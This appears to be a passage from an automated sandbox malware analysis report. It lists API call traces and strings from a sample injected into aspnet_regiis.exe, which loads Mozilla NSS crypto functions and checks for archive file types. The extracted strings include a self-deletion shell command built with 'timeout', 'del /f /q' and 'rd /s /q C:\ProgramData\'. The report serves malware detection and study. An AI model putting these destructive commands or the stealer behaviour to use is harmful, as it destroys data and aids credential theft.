                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBC6FC5
                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3 ref: 6CBC6FF4
Memory Dump Source
• Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
• Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1304971872-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CBC4C4C
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBC4C60
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4CA1
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CBC4CBE
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4CD2
                                                                                                                                                                              • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4D3A
                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4D4F
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4DB7
                                                                                                                                                                                • Part of subcall function 6CC2DD70: TlsGetValue.KERNEL32 ref: 6CC2DD8C
                                                                                                                                                                                • Part of subcall function 6CC2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC2DDB4
                                                                                                                                                                                • Part of subcall function 6CB707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CB0204A), ref: 6CB707AD
                                                                                                                                                                                • Part of subcall function 6CB707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CB0204A), ref: 6CB707CD
                                                                                                                                                                                • Part of subcall function 6CB707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CB0204A), ref: 6CB707D6
                                                                                                                                                                                • Part of subcall function 6CB707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CB0204A), ref: 6CB707E4
                                                                                                                                                                                • Part of subcall function 6CB707A0: TlsSetValue.KERNEL32(00000000,?,6CB0204A), ref: 6CB70864
                                                                                                                                                                                • Part of subcall function 6CB707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB70880
                                                                                                                                                                                • Part of subcall function 6CB707A0: TlsSetValue.KERNEL32(00000000,?,?,6CB0204A), ref: 6CB708CB
                                                                                                                                                                                • Part of subcall function 6CB707A0: TlsGetValue.KERNEL32(?,?,6CB0204A), ref: 6CB708D7
                                                                                                                                                                                • Part of subcall function 6CB707A0: TlsGetValue.KERNEL32(?,?,6CB0204A), ref: 6CB708FB
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CBC4DD7
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBC4DEC
                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CBC4E1B
                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CBC4E2F
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4E5A
                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CBC4E71
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBC4E7A
                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CBC4EA2
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CBC4EC1
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBC4ED6
                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CBC4F01
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBC4F2A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 759471828-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CC16BF7), ref: 6CC16EB6
                                                                                                                                                                                • Part of subcall function 6CB71240: TlsGetValue.KERNEL32(00000040,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB71267
                                                                                                                                                                                • Part of subcall function 6CB71240: EnterCriticalSection.KERNEL32(?,?,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB7127C
                                                                                                                                                                                • Part of subcall function 6CB71240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB71291
                                                                                                                                                                                • Part of subcall function 6CB71240: PR_Unlock.NSS3(?,?,?,?,6CB7116C,NSPR_LOG_MODULES), ref: 6CB712A0
                                                                                                                                                                              • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CCBFC0A,6CC16BF7), ref: 6CC16ECD
                                                                                                                                                                              • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC16EE0
                                                                                                                                                                              • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CC16EFC
                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CC16F04
                                                                                                                                                                              • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC16F18
                                                                                                                                                                              • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CC16BF7), ref: 6CC16F30
                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CC16BF7), ref: 6CC16F54
                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CC16BF7), ref: 6CC16FE0
                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CC16BF7), ref: 6CC16FFD
                                                                                                                                                                              Strings
                                                                                                                                                                              • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CC16FDB
                                                                                                                                                                              • SSLKEYLOGFILE, xrefs: 6CC16EB1
                                                                                                                                                                              • # SSL/TLS secrets log file, generated by NSS, xrefs: 6CC16EF7
                                                                                                                                                                              • NSS_SSL_CBC_RANDOM_IV, xrefs: 6CC16FF8
                                                                                                                                                                              • SSLFORCELOCKS, xrefs: 6CC16F2B
                                                                                                                                                                              • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CC16F4F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                                              • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                                              • API String ID: 412497378-2352201381
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlen.KERNEL32(00000000,76F883C0,00000000,02A1C55B,?), ref: 02A1B875
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,02A3613C), ref: 02A1B8A3
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,.zip), ref: 02A1B8B3
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,.zoo), ref: 02A1B8BF
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,.arc), ref: 02A1B8CB
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,.lzh), ref: 02A1B8D7
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,.arj), ref: 02A1B8E3
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,.gz), ref: 02A1B8EF
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,.tgz), ref: 02A1B8FB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                                              • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                              • API String ID: 1659193697-51310709
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB88E5B
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE007,00000000), ref: 6CB88E81
                                                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CB88EED
                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CCB18D0,?), ref: 6CB88F03
                                                                                                                                                                              • PR_CallOnce.NSS3(6CCE2AA4,6CBE12D0), ref: 6CB88F19
                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6CB88F2B
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB88F53
                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CB88F65
                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6CB88FA1
                                                                                                                                                                              • SECITEM_DupItem_Util.NSS3(?), ref: 6CB88FFE
                                                                                                                                                                              • PR_CallOnce.NSS3(6CCE2AA4,6CBE12D0), ref: 6CB89012
                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6CB89024
                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6CB8902C
                                                                                                                                                                              • PORT_DestroyCheapArena.NSS3(?), ref: 6CB8903E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                                              • String ID: security
                                                                                                                                                                              • API String ID: 3512696800-3315324353
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExitProcessstrtok_s
                                                                                                                                                                              • String ID: block
                                                                                                                                                                              • API String ID: 3407564107-2199623458
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6CBB4E83
                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CBB4EB8
                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CBB4EC7
                                                                                                                                                                                • Part of subcall function 6CC9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC9D963
                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6CBB4EDD
                                                                                                                                                                              • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CBB4F0B
                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CBB4F1A
                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6CBB4F30
                                                                                                                                                                              • PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6CBB4F4F
                                                                                                                                                                              • PR_LogPrint.NSS3( ulCount = %d,?), ref: 6CBB4F68
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                              • String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
                                                                                                                                                                              • API String ID: 1003633598-3530272145
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CBB4CF3
                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CBB4D28
                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CBB4D37
                                                                                                                                                                                • Part of subcall function 6CC9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC9D963
                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6CBB4D4D
                                                                                                                                                                              • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CBB4D7B
                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CBB4D8A
                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6CBB4DA0
                                                                                                                                                                              • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CBB4DBC
                                                                                                                                                                              • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CBB4E20
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                              • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                                                                                                              • API String ID: 1003633598-3553622718
                                                                                                                                                                              APIs
                                                                                                                                                                              • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CCB1DE0,?), ref: 6CBE6CFE
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBE6D26
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CBE6D70
                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000480), ref: 6CBE6D82
                                                                                                                                                                              • DER_GetInteger_Util.NSS3(?), ref: 6CBE6DA2
                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBE6DD8
                                                                                                                                                                              • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CBE6E60
                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CBE6F19
                                                                                                                                                                              • PK11_DigestBegin.NSS3(00000000), ref: 6CBE6F2D
                                                                                                                                                                              • PK11_DigestOp.NSS3(?,?,00000000), ref: 6CBE6F7B
                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CBE7011
                                                                                                                                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6CBE7033
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBE703F
                                                                                                                                                                              • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CBE7060
                                                                                                                                                                              • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CBE7087
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE062,00000000), ref: 6CBE70AF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2108637330-0
                                                                                                                                                                              • Opcode ID: 2652eac30a2e495cb0efa91e5cd82534e0e96d044b897083b037352cfe5b44cf
                                                                                                                                                                              • Instruction ID: e9d0ecd5c3368b7222379cb94cc3f6cc3cbe5aed1082911533c5b872d8f7b8b9
                                                                                                                                                                              • Opcode Fuzzy Hash: 2652eac30a2e495cb0efa91e5cd82534e0e96d044b897083b037352cfe5b44cf
                                                                                                                                                                              • Instruction Fuzzy Hash: C0A129719082C49BEB008B24DC45B6B32A4DB89B8CF248939EA59DBB81E775D845C793
                                                                                                                                                                              APIs
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6CB8AB95,00000000,?,00000000,00000000,00000000), ref: 6CBAAF25
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6CB8AB95,00000000,?,00000000,00000000,00000000), ref: 6CBAAF39
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,6CB8AB95,00000000,?,00000000,00000000,00000000), ref: 6CBAAF51
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CB8AB95,00000000,?,00000000,00000000,00000000), ref: 6CBAAF69
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CBAB06B
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBAB083
                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CBAB0A4
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CBAB0C1
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000), ref: 6CBAB0D9
                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CBAB102
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBAB151
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBAB182
                                                                                                                                                                                • Part of subcall function 6CBDFAB0: free.MOZGLUE(?,-00000001,?,?,6CB7F673,00000000,00000000), ref: 6CBDFAC7
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CBAB177
                                                                                                                                                                                • Part of subcall function 6CC2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC2C2BF
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CB8AB95,00000000,?,00000000,00000000,00000000), ref: 6CBAB1A2
                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,6CB8AB95,00000000,?,00000000,00000000,00000000), ref: 6CBAB1AA
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CB8AB95,00000000,?,00000000,00000000,00000000), ref: 6CBAB1C2
                                                                                                                                                                                • Part of subcall function 6CBD1560: TlsGetValue.KERNEL32(00000000,?,6CBA0844,?), ref: 6CBD157A
                                                                                                                                                                                • Part of subcall function 6CBD1560: EnterCriticalSection.KERNEL32(?,?,?,6CBA0844,?), ref: 6CBD158F
                                                                                                                                                                                • Part of subcall function 6CBD1560: PR_Unlock.NSS3(?,?,?,?,6CBA0844,?), ref: 6CBD15B2
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4188828017-0
                                                                                                                                                                              • Opcode ID: c89b836a5e4fae082810e9e65b712b4c9c8a2ee5b511fb90fda9ab82ae30a12d
                                                                                                                                                                              • Instruction ID: 509ea8717d903ea5a689a9017ffa801290441cf4e4c830269399f893a6da9ee0
                                                                                                                                                                              • Opcode Fuzzy Hash: c89b836a5e4fae082810e9e65b712b4c9c8a2ee5b511fb90fda9ab82ae30a12d
                                                                                                                                                                              • Instruction Fuzzy Hash: B9A191B1D04249ABEF009FA4DC41BEEB7B4EF09308F144125E915A7751E731E95ACBE1
                                                                                                                                                                              APIs
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000132), ref: 6CBBCE9E
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000321), ref: 6CBBCEBB
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00001081), ref: 6CBBCED8
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000551), ref: 6CBBCEF5
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000651), ref: 6CBBCF12
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000321), ref: 6CBBCF2F
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000121), ref: 6CBBCF4C
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000400), ref: 6CBBCF69
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000341), ref: 6CBBCF86
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000311), ref: 6CBBCFA3
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000301), ref: 6CBBCFBC
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000331), ref: 6CBBCFD5
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000101), ref: 6CBBCFEE
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000141), ref: 6CBBD007
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00001008), ref: 6CBBD021
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DoesK11_Mechanism
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 622698949-0
                                                                                                                                                                              • Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                                                                                                                                              • Instruction ID: 4ca0eff70f415d8f37ea29f608b72782266e0a0e2a9580bab72a1f1b1dc236c6
                                                                                                                                                                              • Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                                                                                                                                              • Instruction Fuzzy Hash: F03166717529D127EF0D10666D31BEE244ECB6931EF450038F90AF57C0FA99AA1702EB
                                                                                                                                                                              APIs
                                                                                                                                                                              • PK11_SignatureLen.NSS3(?), ref: 6CB94D80
                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000), ref: 6CB94D95
                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6CB94DF2
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB94E2C
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CB94E43
                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6CB94E58
                                                                                                                                                                              • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CB94E85
                                                                                                                                                                              • DER_Encode_Util.NSS3(?,?,6CCE05A4,00000000), ref: 6CB94EA7
                                                                                                                                                                              • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CB94F17
                                                                                                                                                                              • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CB94F45
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB94F62
                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CB94F7A
                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB94F89
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB94FC8
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2843999940-0
                                                                                                                                                                              • Opcode ID: 013ac8ff7bf6d236f6ee6a8e9e628aa3ac26bc0afc31c9aa8e1c11351ce029ab
                                                                                                                                                                              • Instruction ID: 4a641ef98ca6649722e1dddcb4d3fe23e1bd81ba08a01cf75b5a127e3412b5dd
                                                                                                                                                                              • Opcode Fuzzy Hash: 013ac8ff7bf6d236f6ee6a8e9e628aa3ac26bc0afc31c9aa8e1c11351ce029ab
                                                                                                                                                                              • Instruction Fuzzy Hash: FA818F719083429FEB01CF24D840B5AB7E4EB8A758F158939F96DDB641EB30E905CB92
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A18296
                                                                                                                                                                              • _memset.LIBCMT ref: 02A182A5
                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 02A182BA
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 02A18456
                                                                                                                                                                              • _memset.LIBCMT ref: 02A18465
                                                                                                                                                                              • _memset.LIBCMT ref: 02A18477
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 02A18487
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              Strings
                                                                                                                                                                              • /c timeout /t 10 & del /f /q ", xrefs: 02A182E5
                                                                                                                                                                              • " & rd /s /q "C:\ProgramData\, xrefs: 02A18333
                                                                                                                                                                              • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 02A18390
                                                                                                                                                                              • " & exit, xrefs: 02A183DA
                                                                                                                                                                              • " & exit, xrefs: 02A18389
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
